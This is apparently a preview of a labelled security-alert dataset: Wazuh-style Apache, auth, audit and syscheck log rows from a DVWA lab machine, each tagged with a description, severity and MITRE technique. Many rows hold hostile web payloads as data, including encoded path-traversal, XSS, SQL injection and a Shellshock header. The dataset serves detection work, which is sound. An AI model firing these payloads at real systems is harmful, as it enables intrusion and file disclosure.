source
stringclasses
7 values
full_log
stringlengths
39
4.66k
description
stringclasses
59 values
level
int64
3
15
technique
stringclasses
37 values
tactic
stringclasses
23 values
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:27 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%252f%5C%2e%2e%252f%5C%2e%2e%252f%5C%2e%2e%252f%5C%2e%2e%252fetc%252fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:45:42 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:15 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%uEFC8%2e%2e%01%uEFC8etc%uEFC8passwd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:54 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%255cboot%2eini%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/usr/bin/ghostscript' modified Mode: scheduled Changed attributes: inode,mtime Old modification time was: '1697115778', now it is '1702322745' Old inode was: '270380', now it is '273165'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
syscheck
File '/boot/grub/x86_64-efi/legacycfg.mod' modified Mode: scheduled Changed attributes: mtime,inode Old modification time was: '1696137074', now it is '1697479754' Old inode was: '1049190', now it is '1048911'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:17 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%f8%80%80%80%af%2e%2e%01%f8%80%80%80%af%2e%2e%01%f8%80%80%80%af%2e%2e%01%f8%80%80%80%af%2e%2e%01%f8%80%80%80%afetc%f8%80%80%80%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3ciframe%20style%3d%22position%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:22:31 +0500] "GET /DVWA/login.php?user_token=/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/winnt/win.ini&user_token=8b200124ecd990a2056241cb3415035a HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:28:21 +0500] "GET /DVWA/login.php?Login=Login&password=4kqvfG0t&user_token=../../../../../../../../etc&user_token=8b200124ecd990a2056241cb3415035a&username=944607 HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
syscheck
File '/tmp/go-build2724593589/b038/_pkg_.a' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '269840' to '380432' Old md5sum was: '89e5bcc592591a149fe073aaf1117efd' New md5sum is : 'bb913d004b84193c330486c7754f60ae' Old sha1sum was: 'baf80327234bc59c8cea2e36b5e07b9a54ccac1a' New sha1sum is : 'c8bb78a09a09cf14542e42fb5b99de14a1a0ddf9' Old sha256sum was: '93b546d7c3ff975149911e89bebf1d9f270e1d5aa3098a5e37549f4b9f291c80' New sha256sum is : '429eb5cb18b0551121a0a0445465fbf8acc8ccf343cab2f554c7674e26811efc'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
syscheck
File '/tmp/go-build2314020258/b147/_pkg_.a' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '831936' to '1327552' Old md5sum was: 'ee366a6ac988fc311c9d7a6bf0848e87' New md5sum is : '1b6c96e415d30cc70763e27e8b8160ff' Old sha1sum was: '229919276aa2fa47d98d7c57729c5e6b56a719ba' New sha1sum is : 'd87a274a84486896a86c2147435fc667e6535454' Old sha256sum was: '601c67b57c50f80060e9d2f08be7b6fe3b893af9f6e4bcea6fb8a6764bd5dd97' New sha256sum is : 'd1326f89d4ff5a1b85c3ce89ab7f99cdc30083f38f864bd52edc56675f8d1a63'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%%32%%66%5C%2e%2e%%32%%66boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:03 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:50 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%2fetc%2fpasswd%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fbin%2fid%7c&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:39 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c0%2f%2e%2e%2e%2e%2f%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:48 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fopt%2fxampp%2flogs%2ferror%2elog%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2fwindows%2f%5csystem32%2f%5cdrivers%2f%5cetc%2f%5chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:28 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%u2215%5C%2e%2e%u2215%5C%2e%2e%u2215%5C%2e%2e%u2215%5C%2e%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:04 +0500] "GET /gb/admin/addentry.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/audit/audit.log
type=SYSCALL msg=audit(1704468508.136:935): arch=c000003e syscall=59 success=yes exit=0 a0=7f24160ad010 a1=557b80b9d950 a2=7ffe99221d60 a3=0 items=2 ppid=1647 pid=1728 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="mysql" exe="/usr/bin/mariadb" subj=unconfined key="audit-wazuh-c"ARCH=x86_64 SYSCALL=execve AUID="unset" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root" type=EXECVE msg=audit(1704468508.136:935): argc=8 a0="/usr/bin/mysql" a1="--defaults-file=/etc/mysql/debian.cnf" a2="--skip-column-names" a3="--silent" a4="--batch" a5="--force" a6="-e" a7=73656C65637420636F756E74282A2920696E746F2040646973636172642066726F6D20606D7973716C602E6074696D655F7A6F6E655F6E616D6560 type=CWD msg=audit(1704468508.136:935): cwd="/" type=PATH msg=audit(1704468508.136:935): item=0 name="/usr/bin/mysql" inode=294255 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PATH msg=audit(1704468508.136:935): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=264289 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PROCTITLE msg=audit(1704468508.136:935): proctitle=2F7573722F62696E2F6D7973716C002D2D64656661756C74732D66696C653D2F6574632F6D7973716C2F64656269616E2E636E66002D2D736B69702D636F6C756D6E2D6E616D6573002D2D73696C656E74002D2D6261746368002D2D666F726365002D650073656C65637420636F756E74282A2920696E746F20406469736361
Discovery System Architecture via file Command
14
["T1083"]
["TA0007"]
syscheck
File '/boot/grub/x86_64-efi/afs.mod' modified Mode: scheduled Changed attributes: mtime,inode Old modification time was: '1696137074', now it is '1697479754' Old inode was: '1049237', now it is '1048958'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:25 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0%3a0%3a20'%20%2f%2a&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8passwd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:20:34 +0500] "GET /DVWA/login.php?Login=Login&Login=/%80../%80../%80../%80../%80../%80../%80../%80../winnt/win.ini HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:46 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fusr%2flocal%2fphp4%2flib%2fphp%2eini%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 306 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/usr/bin/x86_64-linux-gnu-readelf' modified Mode: scheduled Changed attributes: inode,mtime,md5,sha1,sha256 Old modification time was: '1685861380', now it is '1701687470' Old inode was: '273002', now it is '292999' Old md5sum was: '375f67ddec80a64e69d2a47a05cdd3f5' New md5sum is : '1d9acffd4fda0442a4fca567dc2f41e3' Old sha1sum was: 'b283fb44629e77d030b82231568b38798df0140f' New sha1sum is : '50f3bb8698de9598125d0df528896b49f4163612' Old sha256sum was: '8a18acb78aa5ede10f30f815a4aeb58eaa2a85d9b887efff68292c66311fa48c' New sha256sum is : 'f451de6cdc0256ac0420e3a36b5db4bac53777bd532b34706f7b1a31acb3ce28'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:39 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%25c0%25af%5C%2e%2e%25c0%25af%5C%2e%2e%25c0%25af%5C%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:22:16 +0500] "GET /DVWA/login.php?Login=<%00script>alert(219);</script%00>&Login=Login&password=&user_token=8b200124ecd990a2056241cb3415035a&username= HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/auth.log
Oct 18 23:47:37 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/auth.log
Oct 18 23:49:16 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:02 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:10 sohaib-virtual-machine sudo: sohaib : TTY=pts/3 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "F4YOD3p1"; readlink -e /snap/core22/864/usr/share/bash-completion/completions/openssl 2>/dev/null; printf "command_done_%s" "Te_bNHDw"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:52 +0500] "GET /cgi-bin/backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:03 +0500] "GET /index.cgi HTTP/1.1" 404 494 "-" "() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"bash_cve_2014_6278 Output : $((7+51))\"; }"
Shellshock attack attempt
6
["T1068","T1190"]
["TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:13 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%2f%2e%2e%01%2f%2e%2e%01%2f%2e%2e%01%2f%2e%2e%01%2f%2e%2e%01%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:04 +0500] "GET /scripts/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd%00html HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:13 +0500] "GET /DVWA/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:43:26 sohaib-virtual-machine sudo: sohaib : TTY=pts/9 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "_vwlYT3d"; ls -l /snap/gnome-42-2204/141/usr/lib/x86_64-linux-gnu/libwebp.so.7.1.3; printf "command_done_%s" "jV614ACG"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cimg%20src%3d%22%2f%22%20%3d_%3d%22%20title%3d%22onerror%3d'prompt(1)'%22%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
syscheck
File '/tmp/apt.data.oVi6Wv' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '23880' to '28672' Old md5sum was: 'b38a628096fed26d1652ad7c7c66b8fa' New md5sum is : '1fd48af51f1483cfd8c55974b7a8118e' Old sha1sum was: '7d54ad044e9ed9a0166f3e0b408c368c3f884106' New sha1sum is : 'b801fffea63de360c942b3bd64694d30b8666fb4' Old sha256sum was: '1488151ce20306291f4c0e804f02ad9e4d09ee30b1742022f44910a1ffa623f1' New sha256sum is : 'fe3bd09008f7ccd29ca4a83bf0a2ae756a82f74f17c4a715510c6e7959574e7e'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:42 +0500] "GET /DVWA/sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:36 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%252f%2e%2e%2e%2f%2e%252f%2e%2e%2e%2f%2e%252f%2e%2e%2e%2f%2e%252f%2e%2e%2e%2f%2e%252f%2e%2e%2e%2f%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
